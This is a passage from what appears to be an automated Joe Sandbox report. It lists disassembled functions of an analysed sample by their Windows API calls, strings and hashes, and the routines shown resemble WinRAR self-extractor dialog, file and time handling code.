                                                                                              • EndDialog.USER32(?,00000001), ref: 00C7B610
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00C7B637
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00C7B650
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00C7B661
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00C7B66A
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00C7B67E
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00C7B694
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                              • String ID: LICENSEDLG
                                                                                              • API String ID: 3214253823-2177901306
                                                                                              • Opcode ID: d3be67535659c144b5761228b3760ab1512282124ecb7095f510bed83a3aabf9
                                                                                              • Instruction ID: c1e7b60820769527246a50bbebf5d40d8ff0ac97a44c635f4c6c4a7bc2236662
                                                                                              • Opcode Fuzzy Hash: d3be67535659c144b5761228b3760ab1512282124ecb7095f510bed83a3aabf9
                                                                                              • Instruction Fuzzy Hash: 1A21D332204245BBD6255B66FD4AF7F3B7CEB4AB85F05C018F709921A0CB529E019635
                                                                                              Function 00C7FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,7AC64E7F,00000001,00000000,00000000,?,?,00C6AF6C,ROOT\CIMV2), ref: 00C7FD99
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00C6AF6C,ROOT\CIMV2), ref: 00C7FE14
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00C7FE1F
                                                                                              • _com_issue_error.COMSUPP ref: 00C7FE48
                                                                                              • _com_issue_error.COMSUPP ref: 00C7FE52
                                                                                              • GetLastError.KERNEL32(80070057,7AC64E7F,00000001,00000000,00000000,?,?,00C6AF6C,ROOT\CIMV2), ref: 00C7FE57
                                                                                              • _com_issue_error.COMSUPP ref: 00C7FE6A
                                                                                              • GetLastError.KERNEL32(00000000,?,?,00C6AF6C,ROOT\CIMV2), ref: 00C7FE80
                                                                                              • _com_issue_error.COMSUPP ref: 00C7FE93
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                              • String ID:
                                                                                              • API String ID: 1353541977-0
                                                                                              • Opcode ID: 2d63020c5845c99259bfd0437e6f162e9a1998527b024e9cbc0e1e09be397e29
                                                                                              • Instruction ID: 6f90c4ae2d840a3827db173794edd4430d037e2d639988066874d97edbed1c05
                                                                                              • Opcode Fuzzy Hash: 2d63020c5845c99259bfd0437e6f162e9a1998527b024e9cbc0e1e09be397e29
                                                                                              • Instruction Fuzzy Hash: B941F971A00259EBDB10DF65CC89BAEBBE8EF44710F10823EF919E7251D7349A01D7A5
                                                                                              Function 00C6AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                              • API String ID: 3519838083-3505469590
                                                                                              • Opcode ID: 654b66579cff2e8b75e08c9000bbbf3557d7a60d107849bb5cd7ec139ba01aee
                                                                                              • Instruction ID: 7c6d35f14cd51a9056aa0e5cc3d2e1e952e541ec67a081dab287688475f5e331
                                                                                              • Opcode Fuzzy Hash: 654b66579cff2e8b75e08c9000bbbf3557d7a60d107849bb5cd7ec139ba01aee
                                                                                              • Instruction Fuzzy Hash: CD715D71A00619EFDF24DFA5CC99AAFBBB9FF48710B140159E512E72A0CB30AE41CB51
                                                                                              Function 00C69382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C69387
                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00C693AA
                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00C693C9
                                                                                                • Part of subcall function 00C6C29A: _wcslen.LIBCMT ref: 00C6C2A2
                                                                                                • Part of subcall function 00C71FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00C6C116,00000000,.exe,?,?,00000800,?,?,?,00C78E3C), ref: 00C71FD1
                                                                                              • _swprintf.LIBCMT ref: 00C69465
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00C694D4
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00C69514
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: rtmp%d
                                                                                              • API String ID: 3726343395-3303766350
                                                                                              • Opcode ID: f59c472d3c598f2581ad3dc5d183d4a38954f82d9e764ed202d0f39cbb19b716
                                                                                              • Instruction ID: b585ff06563527461d08e3b18eb4807eb4a539562b09bbeb5cea39297c97756f
                                                                                              • Opcode Fuzzy Hash: f59c472d3c598f2581ad3dc5d183d4a38954f82d9e764ed202d0f39cbb19b716
                                                                                              • Instruction Fuzzy Hash: 734179B1900258A6DF31EBA0CCD5EEE737CEF45740F0049A5B65AE3051DB388B89EB60
                                                                                              Function 00C71218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __aulldiv.LIBCMT ref: 00C7122E
                                                                                                • Part of subcall function 00C6B146: GetVersionExW.KERNEL32(?), ref: 00C6B16B
                                                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00C71251
                                                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00C71263
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00C71274
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C71284
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C71294
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00C712CF
                                                                                              • __aullrem.LIBCMT ref: 00C71379
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                              • String ID:
                                                                                              • API String ID: 1247370737-0
                                                                                              • Opcode ID: d8a43c97e1b54c65a6237f0c5f706dc6b4a235507ecfca11dd2ccd8c6b256ef4
                                                                                              • Instruction ID: ae319a58b255c386bd7e62fbfdbe527be8329a5e471b89454cbadf2a021b0dec
                                                                                              • Opcode Fuzzy Hash: d8a43c97e1b54c65a6237f0c5f706dc6b4a235507ecfca11dd2ccd8c6b256ef4
                                                                                              • Instruction Fuzzy Hash: 1E41F8B1508345AFC710DF65C884A6FBBE9FF88314F04892EF99AC2210E738E659DB51
                                                                                              Function 00C62210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00C62536
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                                • Part of subcall function 00C705DA: _wcslen.LIBCMT ref: 00C705E0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                              • API String ID: 3053425827-2277559157
                                                                                              • Opcode ID: ac995e3181204cfff87593924a07e1a5232fb3aea34bf8823e886502437d54c7
                                                                                              • Instruction ID: 59445f2d6535e773715642782e3d03de4f369321151bacd05fa2416a1d324e9f
                                                                                              • Opcode Fuzzy Hash: ac995e3181204cfff87593924a07e1a5232fb3aea34bf8823e886502437d54c7
                                                                                              • Instruction Fuzzy Hash: 52F144716087409BCB35EF2888D5BFE77996F94300F08456DFDDA9B283CB248A49C762
                                                                                              Function 00C79CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                                                              • API String ID: 176396367-3568243669
                                                                                              • Opcode ID: a83b0251bcbfef44ba64334634cfb8fad77867869c959a49d2324fe56fd0f40a
                                                                                              • Instruction ID: 6484aa97358f0687f93ac9833b4c431ed022fbf42cde590d40f609f75234f25f
                                                                                              • Opcode Fuzzy Hash: a83b0251bcbfef44ba64334634cfb8fad77867869c959a49d2324fe56fd0f40a
                                                                                              • Instruction Fuzzy Hash: 8C51F86674032395DB309A699822B7673E1DFB1750F68C42BFDD98B2C0FB758E818261
                                                                                              Function 00C8F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00C8FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00C8F6CF
                                                                                              • __fassign.LIBCMT ref: 00C8F74A
                                                                                              • __fassign.LIBCMT ref: 00C8F765
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00C8F78B
                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,00C8FE02,00000000,?,?,?,?,?,?,?,?,?,00C8FE02,00000000), ref: 00C8F7AA
                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,00C8FE02,00000000,?,?,?,?,?,?,?,?,?,00C8FE02,00000000), ref: 00C8F7E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 974fef4378f0703edf5367fec33ef3c0c56a59c4c4dba958e67a44caab8d42e7
                                                                                              • Instruction ID: 36a820618bf014f832c8880150d2af72c3947845e5cccb9b3982b3e9a4fff3e7
                                                                                              • Opcode Fuzzy Hash: 974fef4378f0703edf5367fec33ef3c0c56a59c4c4dba958e67a44caab8d42e7
                                                                                              • Instruction Fuzzy Hash: 1651C4B19002499FDB10DFA8DC85BEEBBF4EF09314F14416EE551E7291D770AA42CBA4
                                                                                              Function 00C82900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C82937
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00C8293F
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C829C8
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00C829F3
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C82A48
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 0040500cfee964357df9d507bfd3c402dffb3395d8da644d3fc9705ea06c33a2
                                                                                              • Instruction ID: 256ca9c7291296c11d5c280c619319f4173dad98a6b439cacc891e0721742189
                                                                                              • Opcode Fuzzy Hash: 0040500cfee964357df9d507bfd3c402dffb3395d8da644d3fc9705ea06c33a2
                                                                                              • Instruction Fuzzy Hash: A341D634A00248AFCF14EF68C889A9E7BF5EF44328F148055E815AB392D731DA01DB95
                                                                                              Function 00C79ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00C79EEE
                                                                                              • GetWindowRect.USER32(?,00000000), ref: 00C79F44
                                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00C79FDB
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00C79FE3
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00C79FF9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$RectText
                                                                                              • String ID: RarHtmlClassName
                                                                                              • API String ID: 3937224194-1658105358
                                                                                              • Opcode ID: 9604fd14804ec1d30a307daeb1e75ce6b2e22812dbb58d59ebea35acce179e84
                                                                                              • Instruction ID: 72cf7e0166a662288159ab6c41e86a893e9e83a4325f2dba17676dd8d09e38a3
                                                                                              • Opcode Fuzzy Hash: 9604fd14804ec1d30a307daeb1e75ce6b2e22812dbb58d59ebea35acce179e84
                                                                                              • Instruction Fuzzy Hash: 4241C032104210AFCB21AFA5EC48F6F7BB8FF48701F04C559F84A9A056DB34DA05DB65
                                                                                              Function 00C79955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                              • API String ID: 176396367-3743748572
                                                                                              • Opcode ID: 86f74633cd1b889ca4a5ddf4b92b8519ac97ad06cf19192bb74ccfd3c8cc6921
                                                                                              • Instruction ID: fc7b1df64029b6e1c4e873a2bcf5f03cb9bb2d1dbc0a7100da775a2c209b03a1
                                                                                              • Opcode Fuzzy Hash: 86f74633cd1b889ca4a5ddf4b92b8519ac97ad06cf19192bb74ccfd3c8cc6921
                                                                                              • Instruction Fuzzy Hash: 13317D3264434566EA34BB549C42B7A73A4EB90734F50C42FF5AE47280FB70AF4193A9
                                                                                              Function 00C8C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C8C868: _free.LIBCMT ref: 00C8C891
                                                                                              • _free.LIBCMT ref: 00C8C8F2
                                                                                                • Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34), ref: 00C88DE2
                                                                                                • Part of subcall function 00C88DCC: GetLastError.KERNEL32(00C93A34,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34,00C93A34), ref: 00C88DF4
                                                                                              • _free.LIBCMT ref: 00C8C8FD
                                                                                              • _free.LIBCMT ref: 00C8C908
                                                                                              • _free.LIBCMT ref: 00C8C95C
                                                                                              • _free.LIBCMT ref: 00C8C967
                                                                                              • _free.LIBCMT ref: 00C8C972
                                                                                              • _free.LIBCMT ref: 00C8C97D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction ID: f0865281a3ce939608f327af74acc888ce43089d2a180d13d09d2ddea587222b
                                                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction Fuzzy Hash: 5D1166715C0705B6E520B771CC8BFCB7BADDF00B08F400C15B29D665D2EA75B909A764
                                                                                              Function 00C7E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00C7E669,00C7E5CC,00C7E86D), ref: 00C7E605
                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00C7E61B
                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00C7E630
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                              • API String ID: 667068680-1718035505
                                                                                              • Opcode ID: fbc131a46a76dcba55ad113be4768bbdb6759a2867a8c32722109f76c53713a5
                                                                                              • Instruction ID: c7943a20c59d88692b268cc5a06ffbd370debe0f59509035ed562c9d5a37292d
